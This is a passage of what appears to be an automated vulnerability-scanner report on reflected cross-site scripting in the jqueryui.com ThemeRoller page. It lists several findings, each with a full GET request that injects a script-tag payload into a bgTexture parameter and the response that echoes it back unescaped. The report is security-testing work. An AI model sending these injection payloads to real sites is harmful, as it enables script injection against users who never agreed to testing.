GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0b5153"><script>alert(1)</script>c40354ad18f&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b38f"><script>alert(1)</script>e88a1ca4744 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png8b38f"><script>alert(1)</script>e88a1ca4744&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cea95"><script>alert(1)</script>1eeea06abb0 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.pngcea95"><script>alert(1)</script>1eeea06abb0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&
...[SNIP]...

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fc0e"><script>alert(1)</script>8558d7e3ed7 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png8fc0e"><script>alert(1)</script>8558d7e3ed7&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=
...[SNIP]...

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bebe2"><script>alert(1)</script>50e8d52cb34 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.pngbebe2"><script>alert(1)</script>50e8d52cb34&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b224"><script>alert(1)</script>3defc719190 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png1b224"><script>alert(1)</script>3defc719190&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffff
...[SNIP]...

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6094c"><script>alert(1)</script>a35bfbf3e53 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png6094c"><script>alert(1)</script>a35bfbf3e53&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcEr
...[SNIP]...

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af8d6"><script>alert(1)</script>cb13d41972f was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.pngaf8d6"><script>alert(1)</script>cb13d41972f&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000
...[SNIP]...

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc2"><script>alert(1)</script>ac4e48b54f7 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png84fc2"><script>alert(1)</script>ac4e48b54f7&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cad01"><script>alert(1)</script>9374f53a89e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorH